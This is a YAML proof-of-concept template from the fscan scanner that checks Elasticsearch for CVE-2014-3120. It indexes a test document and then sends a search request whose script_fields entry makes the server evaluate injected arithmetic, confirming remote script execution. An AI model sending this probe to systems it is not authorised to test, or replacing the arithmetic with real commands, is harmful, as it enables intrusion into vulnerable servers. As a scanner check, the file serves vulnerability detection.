fscan/WebScan/pocs/elasticsearch-cve-2014-3120...

46 lines
1.0 KiB
YAML

name: poc-yaml-elasticsearch-cve-2014-3120
set:
r: randomInt(800000000, 1000000000)
r1: randomInt(800000000, 1000000000)
rules:
- method: POST
path: /test/test1/123
headers:
Content-Type: application/json
body: |
{
"name": "test"
}
expression: |
response.status == 201 || response.status == 200
- method: POST
path: /_search
headers:
Content-Type: application/json
body: |-
{
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {
}
}
}
},
"script_fields": {
"command": {
"script": "{{r}}+{{r1}}"
}
}
}
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r + r1)))
detail:
author: suancaiyu、violin
elasticsearch: v1.1.1
links:
- https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120